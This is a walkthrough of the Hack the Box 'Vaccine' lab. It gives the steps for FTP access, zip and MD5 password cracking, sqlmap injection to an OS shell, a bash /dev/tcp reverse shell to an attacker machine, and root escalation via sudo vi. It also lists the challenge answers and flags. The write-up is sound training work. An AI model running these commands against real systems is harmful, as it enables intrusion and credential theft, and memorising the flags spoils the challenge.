This article discusses the solution for Hack the Box Vaccine Challenge tasks so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Vaccine Solution
Besides SSH and HTTP, what other service is hosted on this box?
Run an nmap scan with the
-sV
(version of services)-sC
(default scripts for service discovery and vulnerability detection)nmap -sV -sC {target_machine_ip} nmap -sC -sV 10.129.251.21
Answer: ftp
This service can be configured to allow login with any password for specific username. What is that username?
As with the nmap results above the sC
option was able to determine that Anonymous FTP login allowed. If you do a google search the username for this is usually anonymous
anonymous
What is the name of the file downloaded over this service?
- Let's connect via ftp
ftp {target_machine_ip}
For username just use
anonymous
and just enter blank password.Enter
ls
and you will findbackup.zip
Run
get
backup.zip
Answer:backup.zip
What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
We try to unzip the backup.zip however a password is required.
Do a quick google search and you will find the answer
Answer: zip2john
What is the password for the admin user on the website?
Let's run the
zip2john
script to crack the password. First let's obtain the password hashes.zip2john backup.zip > zip.txt
Then let's crack the password for the backup.zip
john zip.txt
Now let's unzip backup.zip with the password
741852963
. This gives us two filesindex.php
andstyle.css
unzip backup.zip
- Now let's investigate the index.php
vim index.php
. Here we find a hashed password2cb42f8734ea607eefed3b70af13bbd3
for the usernameadmin
.
Let's analyze the hash type by going on any hash analyzer. We use https://hashes.com/en/tools/hash_identifier in this case and find that it is MD5 format.
Create a file called
admin-hash.txt
then insert the hash found in the previous step. Let's crack the hash password using john
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 admin-hash.txt
Answer: qwerty789
What option can be passed to sqlmap to try to get command execution via the sql injection?
Login using username
admin
and passwordqwerty789
Go to browser and get the cookie
PHPSESSID
value
- Next as we view with the page after we login, we can see one possible form to attack with SQL injection. We observe that submitting it appends a query parameter
search
- Let's use sqlmap and run the following.
sqlmap -u "http://{target_ip}/dashboard.php?search=test" --cookie="PHPSESSID={cookie_value}"
sqlmap -u "http://{target_ip}/dashboard.php?search=test" --cookie="PHPSESSID={cookie_value}" --os-shell
- We have spawned a os-shell with user postgres. However executing
sudo -l
does not yield any meaningful results. The os-shell is limited in commands it can execute. It is not interactive
- Let's go to our attack machine and create a netcat listner server
nc -lvnp 5000
- On our target machine running sqlmap os-shell let's connect to our server to spawn a reverse shell.
bash -c "bash -i >& /dev/tcp/{attack_machine_ip}/5000 0>&1"
- We have spawned a reverse shell however we do not have an interactive shell yet.
- Run the following to have an interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo
export TERM=xterm
- We now have an interactive shell. Hovever we have to know the password of user
postgres
to runsudo -l
- We have to find the password in the system. And since this server running a website, one of the places we can look at is
/var/www/
- Let's explore each of the files in the
html
folder. Under thedashboard.php
file we find.
- We test this password by using it for the password prompt for
sudo -l
Where we find that we have sudo rights for vi program.
Answer: vi
Submit user flag
Our connection via reverse shell is always being disconnected from the server. Since we know the password (
P@s5w0rd!
) of the userpostgres
, let's just connect via ssh.ssh postgres@{target_machine_ip}
Run
cd ~/
to go topostgres
user's folder to see if there is something interesting. In here we will finduser.txt
Answer:ec9b13ca4d6229cd5cc1e09980965bf7
Submit the root flag
Continuing with our terminal established via ssh connnection in the previous section. We know that our current
postgres
user has sudo privileges forvi
. Now let's attempt priviledge escalation.Let's go to https://gtfobins.github.io/gtfobins/vi/#shell to check if we can run a command to escalte our privileges to root.
Run the following:
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
Then execute the following from inside vi based on GTFOBins
:set shell=/bin/sh :shell
Now we have escalated our privileges and have a shell with root privileges. Now let's look for
root.txt
find / -type f -name "root.txt"
Now let's look at the file to get flag
vi /root/root.txt
Answer: ddd6e058e814260bc70e9bbdef2715849
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)